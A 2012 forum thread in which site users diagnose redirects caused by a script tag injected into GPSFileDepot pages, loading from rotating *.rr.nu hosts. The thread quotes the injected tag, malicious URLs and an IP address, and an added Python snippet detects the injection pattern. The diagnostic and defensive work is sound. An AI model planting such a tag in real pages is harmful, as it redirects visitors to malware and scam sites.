GPSFileDepot Forums

Site Support => Site Support => Topic started by: jbensman on March 01, 2012, 06:34:21 PM

Title: Domain forwarding issue
Post by: jbensman on March 01, 2012, 06:34:21 PM
Is there another issue with the name server again?  Starting yesterday I started getting messages like this whenever I tried to access this site (no problems on any other sites):

Malicious Web Site Blocked

You attempted to access:

http://www3.thebesttuchecker.de.lv/?p3ma=lKjWxbGdm5KbmeDnspCai9ff0a%2BlZJ%2BW1ZzKksqkpJg%3D


This is a known malicious web site. It is recommended that you do NOT visit this site. The detailed report explains the security risks on this site.

For your protection, this web site has been blocked. Visit Symantec to learn more about phishing and internet security.

So I went and tried my laptop and the same thing would happen (and it only happened on this site).

It was still happening today on both computers except I would get messages like

sweepstakesandcontestsdo.com

Oops! Internet Explorer could not connect to astre09atyqr.rr.nu


I emailed some others to see if they were having problems and they said they were not.  Now it is an intermittent problem.  I've tried what worked when it happened before, but it still keeps happening. 

I'm running IE9 on both computers.
Title: Re: Domain forwarding issue
Post by: Indrid Cold on March 01, 2012, 06:39:34 PM
Quote from: jbensman on March 01, 2012, 06:34:21 PM
Is there another issue with the name server again?  Starting yesterday I started getting messages like this whenever I tried to access this site (no problems on any other sites):
None that I've seen.

Have you checked for the DNS virus?
I think there is a link to check your system here: http://dns-ok.us/
Title: Re: Domain forwarding issue
Post by: jbensman on March 01, 2012, 08:10:07 PM
I tried it and it said I do not have it.

It only happens on this site and it has not happened for a while now.  Yesterday every time I would go to the site, Norton would give me a warning.
Title: Re: Domain forwarding issue
Post by: eaparks on March 01, 2012, 09:06:36 PM
I was also being told by Norton that I was trying to be redirected to a malicious site when trying to access GPSFileDepot's website.  Here is a screen shot of what I was seeing with my PC info. blackened out.  This was only happening to me on Wed. 2-29-12 and only on GPSFileDepot's site.  I updated and ran Norton Antivirus and a malware program and nothing showed up and was still trying to be redirected.

(http://inlinethumb07.webshots.com/49286/2723055240105013954S600x600Q85.jpg) (http://entertainment.webshots.com/photo/2723055240105013954qABeMc)
Title: Re: Domain forwarding issue
Post by: Seldom on March 01, 2012, 09:12:27 PM
So how are you both getting past the redirect?
Title: Re: Domain forwarding issue
Post by: jbensman on March 01, 2012, 09:25:48 PM
That is what I was getting too.  But as I mentioned I was getting the Norton warning up to this afternoon.  Then it started redirecting to other places.  Now it seems to be working.
Title: Re: Domain forwarding issue
Post by: jbensman on March 02, 2012, 04:24:45 AM
It's happening again
Title: Re: Domain forwarding issue
Post by: maps4gps on March 02, 2012, 05:11:58 AM
Starting yesterday morning, after less than a second on the gpsfiledepot webpage, a sex scandal webpage appears.  I blocked it and all was OK the rest of the day.  This morning it is back with a different URL.  This is not happening on other websites we visit.  I remember we had some similar 1-1/2? years ago.
Title: Re: Domain forwarding issue
Post by: Boyd on March 02, 2012, 05:49:14 AM
Hah - I also got the re-direct to some sex site yesterday when I tried to open the gpsfiledepot forums. I tried a second time and then it was ok. Weird.
Title: Re: Domain forwarding issue
Post by: jbensman on March 02, 2012, 06:16:18 AM
I cannot access the site using Internet Explorer.  My previous message where I said it was happening again I was able to cut and paste before Norton blocked the redirect.  I am on Firefox now and I am not having any trouble.  Just before opening Firefox, IE blocked me.  So has the site been hacked or what the heck is going on?
Title: Re: Domain forwarding issue
Post by: Seldom on March 02, 2012, 07:23:08 AM
Confirming it's an IE thing.  When I typed "www.gpsfiledepot.com"  into IE I got Paris Hilton in her underwear.  Firefox (my normal browser) works just fine.  The second time I tried it with IE I got the Kaimedia Hawaii site that I got the last time this happened.

Deleted my browsing history (per jbensman's suggestions from the first time this happened, above) and now gpsfiledepot works in both IE and Firefox.
Title: Re: Domain forwarding issue
Post by: dbperry on March 02, 2012, 07:44:35 AM
When I load this page (this thread in the forum), my anti-virus blocks a script from running. Looking at the source code for this page, the script is at the very bottom of the HTML for this page. The script that my anti-virus doesn't like is:
ligen92tcusto.rr.nu/nl.php?p=d

Could this be the source of your problem? Is there a purpose to that script being called from this page? Anyone want to go hunting and try to figure out if that script is really bad or if my anti-virus software is just over-reacting?

BTW, I never get redirected and never have had trouble loading the forum or the main part of the site.

Dave
Title: Re: Domain forwarding issue
Post by: maps4gps on March 02, 2012, 07:58:10 AM
I just logged in again, and now it is referencing another URL.

I would say something in our webpage, or perhaps the entire web service provider.
Title: Re: Domain forwarding issue
Post by: omegaman on March 02, 2012, 08:13:23 AM
Over the last week, I have been redirected a couple of times to a 'ransomware site', as I have tried to get to the GpsFileDepot using Internet Explorer. It doesn't happen when accessing other sites, only this one.
I'm guessing the previous post is correct. This site has been infiltrated by malware it seems.
Title: Re: Domain forwarding issue
Post by: dbperry on March 02, 2012, 08:54:45 AM
Yes, I did a little searching and the problem is definitely the rr.nu script. There is a known malware / virus infection that inserts script references to random *.rr.nu pages at the bottom of HTML pages of infected websites / web servers. The script creates a redirect via browser security holes - exactly the problem we're seeing here. I'm not sure if this is a problem that falls to Oz to fix or to his webhost.

The reason that not all of us see the problem is that the problem can be blocked with up-to-date browser updates (like Microsoft security patches) and up-to-date anti-virus software. Perhaps the exploit only works on certain browsers, also.

Bottom line, the problem is on this website, not your machine - unless when the script runs  it infects your machine with a virus...that could be possible.

Dave
Title: Re: Domain forwarding issue
Post by: Seldom on March 02, 2012, 09:12:35 AM
Quote from: dbperry on March 02, 2012, 08:54:45 AM
Bottom line, the problem is on this website, not your machine - unless when the script runs  it infects your machine with a virus...that could be possible.

Not sure this explains why the problem went away when I deleted my browsing history.  Is it possible that browsing history can be infected?
Title: Re: Domain forwarding issue
Post by: jbensman on March 02, 2012, 09:36:03 AM
I just deleted my browsing history and temp files.  I then tried the site again with IE9 and I got redirected.

Is there any danger in downloading the maps?
Title: Re: Domain forwarding issue
Post by: Boyd on March 02, 2012, 09:57:20 AM
Something is definitely wrong here. Normally I use Firefox 7.01 on Windows. Am not getting the redirect there now. I tried IE 7 just now (which I never really use) and the site is ok there too.

So I tried Safari 5.1.3 on MacOS X, and my usual link to the forum - http://forums.gpsfiledepot.com/ just redirected me to the Russian site. Now it is working normally again.

If I look at the "activity" window in Safari, there is an entry for

http://rmore79riveru.rr.nu/nl.php?p=d

Googling this, I see that this may be malware infecting the forum software: http://pastebin.com/wKkNk7n6

I'm going to use the "report to moderator" button to make sure that Oz and Indrid are aware of this.
Title: Re: Domain forwarding issue
Post by: Seldom on March 02, 2012, 10:04:12 AM
Would Anti-Virus/Firewall matter? 
I'm using BitDefender.
Also, jbensman, when I deleted my browsing history I had "Preserve Favorites Website Data" unchecked.
Title: Re: Domain forwarding issue
Post by: Boyd on March 02, 2012, 10:16:19 AM
Safari has an "activity" window that shows everything happening when you open a page. On almost every page I access, there are php scripts being executed on some foreign site. Right now I see one for http://astre09atyqr.rr.nu/nl.php?p=d

If I go to the forum homepage there's a link to http://asin54grepl.rr.nu/nl.php?p=d

If I do it again then it's http://ionbr82eastna.rr.nu/nl.php?p=d

There seem to be a large number of permutations of similar links. I don't see these listed in Firefox on Windows, so maybe they are being blocked. But something must be infected somewhere on the site...
Title: Re: Domain forwarding issue
Post by: Boyd on March 02, 2012, 10:23:10 AM
Googling around some more, I found these:

http://webmasters.stackexchange.com/questions/26475/is-someone-hijacking-my-site

http://www.google.vu/support/forum/p/Webmasters/thread?tid=0c8c5f8c216cc9bd&hl=en

Quote
This line of code at the end of the homepage.

< sc ript src="http://ionis90landsi.rr.nu/nl.php?p=d"> < / sc ript >

From what I have seen this hack always includes a backdoor on the site.
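
A server-side check for the injected tag quoted above, as an added example that is not part of the original thread or of the site's own code: it parses a page, collects every external `<script src>`, and flags the `*.rr.nu/nl.php` shape reported here as well as any script host missing from an allowlist. The sample page, the `static.example.org` host and the `abcde00sample` label are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Shape reported in the thread: <random label>.rr.nu/nl.php?p=d
RR_NU_HOST = re.compile(r"^[a-z0-9-]+\.rr\.nu$")


class _ScriptCollector(HTMLParser):
    """Collect each <script src=...> with its line number and whether it
    appears after the closing </body> or </html> tag."""

    def __init__(self):
        super().__init__()
        self.trailing = False
        self.scripts = []  # (line, src, trailing)

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append((self.getpos()[0], src.strip(), self.trailing))

    def handle_endtag(self, tag):
        if tag in ("body", "html"):
            self.trailing = True


def classify(src, allowed_hosts):
    """Return a verdict string for a script URL, or None if it looks fine."""
    parts = urlsplit(src)
    host = (parts.hostname or "").lower()
    if not host:
        return None  # relative URL, served from the site itself
    if RR_NU_HOST.match(host) and parts.path.endswith("/nl.php"):
        return "rr.nu-injection"
    if host not in allowed_hosts:
        return "unlisted-offsite-script"
    return None


def scan_html(html, allowed_hosts):
    """List suspicious external scripts in one page of served HTML."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for line, src, trailing in collector.scripts:
        verdict = classify(src, allowed_hosts)
        if verdict:
            findings.append({"line": line, "src": src,
                             "verdict": verdict, "trailing": trailing})
    return findings


# Constructed sample: a clean page with one tag appended after </html>.
SAMPLE_PAGE = """<html>
<head>
<script src="/js/forum.js"></script>
<script src="https://static.example.org/lib.js"></script>
</head>
<body><p>Forum index</p></body>
</html>
<script src="http://abcde00sample.rr.nu/nl.php?p=d"></script>
"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE, {"static.example.org"}):
        print(finding)
```

Because the tag was reported as generated at request time with a different subdomain on each load, run the check against the HTML the server actually returns, not only against the files on disk.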
Title: Re: Domain forwarding issue
Post by: -Oz- on March 02, 2012, 11:39:32 AM
I have reuploaded original files from my computer however I am not sure how the exploit occurred since the pages are custom code (not wordpress or anything).

Passwords have been changed in case that was the exploit.

The site was definitely hijacked on the night of the 28th (not sure how I missed this thread).  I never noticed because I use Chrome.

However the backdoor still seems to be there which means the exploit is loaded in real time at the host.
Title: Re: Domain forwarding issue
Post by: jbensman on March 02, 2012, 12:16:20 PM
I am still getting the redirect in Internet Explorer.  I tried deleting history, temp files, and files. 
Title: Re: Domain forwarding issue
Post by: Indrid Cold on March 02, 2012, 12:38:17 PM
wish I could help here but I'm not getting anything out of the usual.
Title: Re: Domain forwarding issue
Post by: jbensman on March 02, 2012, 02:10:33 PM
Eaparks emailed me this:


The hack/being redirected is back again, at least for me.  I'm not able to access GPSFileDepot, I'm being redirected to a site address called "rmore79riveru.rr.nu" (194.28.114.103.80).

I can just briefly see that there have been several posts in the Download thread on GPSFileDepot on the home page but I am redirected and blocked by Norton so I am unable to see what everyone is saying about this.  If you are able to get on GPSFileDepot you're welcome to say I'm unable to access the website if it will help in the discussion going on.  If there is a solution being discussed please advise me since I'm unable to participate in the discussion.

Thanks
Ed
Title: Re: Domain forwarding issue
Post by: Indrid Cold on March 02, 2012, 02:22:38 PM
http://www.magic-net.info/blacklist_lookup/2012/194.28.114.103%20Blacklist%20lookup%20February%2029%202012.html
Title: Re: Domain forwarding issue
Post by: Boyd on March 02, 2012, 02:26:44 PM
Quote from: Indrid Cold on March 02, 2012, 12:38:17 PM
wish I could help here but I'm not getting anything out of the usual.

You have a Mac, right? In Safari go Window > Activity then go to http://forums.gpsfiledepot.com/ and observe what happens. Hit refresh, and every time you do a different but similar url is embedded - here are two screenshots.

Title: Re: Domain forwarding issue
Post by: Indrid Cold on March 02, 2012, 02:41:08 PM
Quote from: Boyd on March 02, 2012, 02:26:44 PM
You have a Mac, right?
I might have a dozen or so Macs as well as them others...

Will give it a look when I get a chance, Safari seems to be working OK on the iPhone. NO cheesecake for me:(
Title: Re: Domain forwarding issue
Post by: Boyd on March 03, 2012, 05:48:21 AM
FYI... when I started up my computer this morning I once again was redirected to http://myustreamtv.rr.nu/2f/

And using safari, I still see activity from url's such as http://sbulle06tsconti.rr.nu/nl.php?p=d

The redirect only happened the first time, but those URL's are embedded in the activity on every page.
Title: Re: Domain forwarding issue
Post by: dbperry on March 03, 2012, 06:20:42 AM
Quote from: -Oz- on March 02, 2012, 11:39:32 AM
However the backdoor still seems to be there which means the exploit is loaded in real time at the host.

Yes, it appears that the link to the *.rr.nu script is loaded dynamically. That is why the subdomain (part of the web address before .rr.nu) is always different. I also wonder if that is why the redirect only happens sometimes - I wonder if sometimes, the dynamically loaded script is actually broken, so it doesn't redirect. That could explain the random / intermittent nature of the redirect that some people experience.

Oz, have you engaged / contacted your webhost? This is clearly at least somewhat their problem, not necessarily yours. What say they?

P.S. For me, Google Chrome (on Windows 7) appears to work OK, even with my anti-virus turned off. You may want to try that to access the site without problems. Deleting history, temp files, etc. probably won't fix the problem for you if you are having the redirect problem (since the problem really isn't on your computer), but either using a different browser or updating your anti-virus (so that it can block the script from running) might help.

Another work around that worked for me is to put "gpsfiledepot.com" in your 'restricted sites' list in Internet Explorer. Then IE will block the script from running and IE will access the site without the redirect. You might not be able to download or upload files with gpsfiledepot in your restricted sites list, but at least you would be able to get to this forum to find out when the problem gets fixed.

Dave
Title: Re: Domain forwarding issue
Post by: jbensman on March 03, 2012, 06:51:23 AM
I would suggest until this gets fixed, put some simple HTML at gpsfiledepot.com stating the site has been hacked and the problem is being worked on, then give a link to the site and let people know which browsers work.
Title: Re: Domain forwarding issue
Post by: -Oz- on March 03, 2012, 09:06:47 AM
I wonder if I could pull that off based on browser.  This exploit appears to be based on php itself.
Title: Re: Domain forwarding issue
Post by: Boyd on March 03, 2012, 10:20:16 AM
Here's a wikipedia page on "SQL injection" which seems to be what is happening: http://en.wikipedia.org/wiki/SQL_injection

Also, look at this post from just a few days ago. Their site seems to be suffering from the exact same thing - also getting redirected to myustreamtv.rr.nu as we are here:

http://www.htmlforums.com/website-review/t-need-help-146029.html
Title: Re: Domain forwarding issue
Post by: Indrid Cold on March 03, 2012, 02:44:32 PM
Quote from: Boyd on March 02, 2012, 02:26:44 PM
You have a Mac, right? In Safari go Window > Activity then go to http://forums.gpsfiledepot.com/ and observe what happens. Hit refresh, and every time you do a different but similar url is embedded - here are two screenshots.
I tried that and struck out, nothing in the Activity window. Lots of refreshing....

I'll have to take a laptop offsite to Starbucks later and mess with the settings.
Title: Re: Domain forwarding issue
Post by: GreyDude on March 03, 2012, 02:47:53 PM
Been having the same attack/redirect problem for gpsfiledepot.com for the past 3 days. I used Norton Internet Security's Safe Web facility and it returned a 'green' site access -- no problems, but when I try to access the site through IE8, I get rerouted.  Using Firefox the website is accessible and have never been redirected using this browser.  Norton Customer Support basically said it was an IE problem.
Within the past hour or so, I have been able to access the gpsfiledepot.com site with IE. Not sure if this is only temporary or someone has found and disabled the culprit.
Thanks for your continued support.
Title: Re: Domain forwarding issue
Post by: -Oz- on March 03, 2012, 02:55:54 PM
I believe it has been fixed.  Not seeing it anymore; found a script that cleaned everything out.
Title: Re: Domain forwarding issue
Post by: Boyd on March 03, 2012, 04:14:39 PM
Quote from: Indrid Cold on March 03, 2012, 02:44:32 PM
I tried that and struck out, nothing in the Activity window.

Yep, it's gone now. Nice work Dan!  :)
Title: Re: Domain forwarding issue
Post by: Indrid Cold on March 03, 2012, 04:32:31 PM
Quote from: Boyd on March 03, 2012, 04:14:39 PM
Quote from: Indrid Cold on March 03, 2012, 02:44:32 PM
I tried that and struck out, nothing in the Activity window.

Yep, it's gone now. Nice work Dan!  :)
Turns out I had JavaScript off so I wasn't redirected.
Title: Re: Domain forwarding issue
Post by: jbensman on March 03, 2012, 06:05:35 PM
Yes it is now fixed.  Way to go and what a jerk it was that hacked us!  Any idea on how it happened?
Title: Re: Domain forwarding issue
Post by: -Oz- on March 03, 2012, 06:10:14 PM
Still working on how it happened but it was either through the forums or via the map/article writing script.
Title: Re: Domain forwarding issue
Post by: maps4gps on March 04, 2012, 08:14:44 AM
The three URLs I restricted had .de.lv extensions.
Title: Re: Domain forwarding issue
Post by: henry001 on March 05, 2012, 03:04:07 PM
I wonder if it is safe to download map files now???
Title: Re: Domain forwarding issue
Post by: Boyd on March 05, 2012, 03:37:31 PM
I don't think that was ever an issue, from what I saw. I don't believe this was a virus that could infect your own computer, it was an exploit infecting the web server that hosts gpsfiledepot. As far as I could tell, it only attempted to redirect you to a completely unrelated website (see links above) by embedding links to that site in the web page.

I don't see how that could affect a file that you download from GPSFileDepot.
Title: Re: Domain forwarding issue
Post by: henry001 on March 05, 2012, 03:52:17 PM
That is good to hear. I was afraid to open those exec files.
Title: Re: Domain forwarding issue
Post by: Boyd on March 05, 2012, 03:56:58 PM
As always, you should keep your anti virus software up to date.  :)
Title: Re: Domain forwarding issue
Post by: -Oz- on March 05, 2012, 07:37:25 PM
Yes, the .exe files were not modified.  It could only embed in the web pages itself.
Title: Re: Domain forwarding issue
Post by: GreyDude on March 06, 2012, 09:35:02 AM
Looks like the culprit script is back.  Tried to access the GPSFileDepot site from IE and again get rerouted.

Access from Firefox is OK
Title: Re: Domain forwarding issue
Post by: Boyd on March 06, 2012, 11:03:05 AM
DAMN.... I'm afraid you're right. I was just redirected to http://ustreamtvonline.rr.nu/2f/

Using the activity monitor in Safari, I once again see the same embedded links on GPSFileDepot pages...
Title: Re: Domain forwarding issue
Post by: Seldom on March 06, 2012, 12:16:20 PM
When I tried to log in the first time I was re-directed to a site that helpfully informed me I had lots of viruses.  Its domain ended in .de.  Second IE login worked OK.  Then when I tried to post this message in IE I got repeated "page timed out" messages.  I'm sending it from Firefox.
Title: Re: Domain forwarding issue
Post by: jbensman on March 06, 2012, 02:16:36 PM
IE not working, Firefox is.
Title: Re: Domain forwarding issue
Post by: -Oz- on March 06, 2012, 05:26:33 PM
Grr, running the cleaner now.  I have to think the exploit is in the forums because I can't get to certain pages around here.  Looks like the forums will have to get a clean install.
Title: Re: Domain forwarding issue
Post by: -Oz- on March 06, 2012, 05:45:43 PM
Fixed again.  It left behind a backdoor in the map upload part of the site that I missed. That has been removed now too.
Title: Re: Domain forwarding issue
Post by: jbensman on March 06, 2012, 06:03:44 PM
test
Title: Re: Domain forwarding issue
Post by: jbensman on March 06, 2012, 06:06:05 PM
I was not able to post on the forums (got timed out) nor send emails, messages or log out on IE or Firefox.  I tried clearing cache and history and still nothing.  I shut down IE and restarted it.  It then allowed me to log off and log back in.  It seems to be working now.
Title: Re: Domain forwarding issue
Post by: -Oz- on March 06, 2012, 08:14:48 PM
Those symptoms (the login/logout/register) all occurred while I was changing security settings.  It broke some of the session data so until the browser cache was cleared there were anomalies.  Hopefully all the backdoors were found but I still may need to do major work on the forum software since it isn't custom built.
Title: Re: Domain forwarding issue
Post by: Boyd on April 06, 2012, 06:11:29 AM
This might be worrisome... a trojan named BackDoor.Flashback.39 has gotten a lot of coverage recently because it can infect Macs: http://news.yahoo.com/more-600-000-macs-infected-flashback-malware-report-091608469.html

This is what caught my eye though. Look at some of the websites that are spreading this virus. They include the sites that we were being redirected to when GPSFileDepot was hacked. I guess I need to take a closer look at my Mac to see if it's been compromised.  >:(

http://news.drweb.com/show/?i=2341&lng=en&c=14

Quote
Systems get infected with BackDoor.Flashback.39 after a user is redirected to a bogus site from a compromised resource or via a traffic distribution system. JavaScript code is used to load a Java-applet containing an exploit. Doctor Web's virus analysts discovered a large number of web-sites containing the code. The recently discovered ones include:

Title: Re: Domain forwarding issue
Post by: -Oz- on April 06, 2012, 09:17:25 AM
I hope it hasn't been compromised.  The kicker is that this is how lots of Windows machines get infected (through Java).  While I was deployed my media center got infected through Java which was super ridiculous because it rarely browses the internet.  Java and Flash are becoming the bane of my existence.